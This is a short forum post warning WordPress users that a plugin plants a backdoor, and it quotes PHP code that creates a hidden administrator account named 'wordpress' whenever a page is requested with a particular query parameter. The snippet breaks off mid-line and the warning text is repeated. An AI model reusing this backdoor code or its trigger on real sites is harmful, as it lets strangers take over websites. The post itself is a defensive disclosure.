Normally i'm not using this plugin my friend ask me to check it, i found out this code
Its creating user as "wordpress" who sending information to creator. But I'm not sure this is orginal copy or not. If you are using this pluging please check you user list. If you see "wordpress" user, delete user and pluging!
PHP:
add_action('wp_head', 'my_wpfunc');function my_wpfunc() { If ($_GET['cms'] == 'wordpress') { require('wp-includes/registration.php'); If (!username_exists('wordpress')) { $user_id = wp_create_user('wordpress', 'wp_include'); $user = new WP_User($user_id); $user->set_role('administrator'); } }}add_action('wp_head', 'my_wpfuncc');function my_wpfuncc() { If (!username_exists('w
Its creating user as "wordpress" who sending information to creator. But I'm not sure this is orginal copy or not. If you are using this pluging please check you user list. If you see "wordpress" user, delete user and pluging!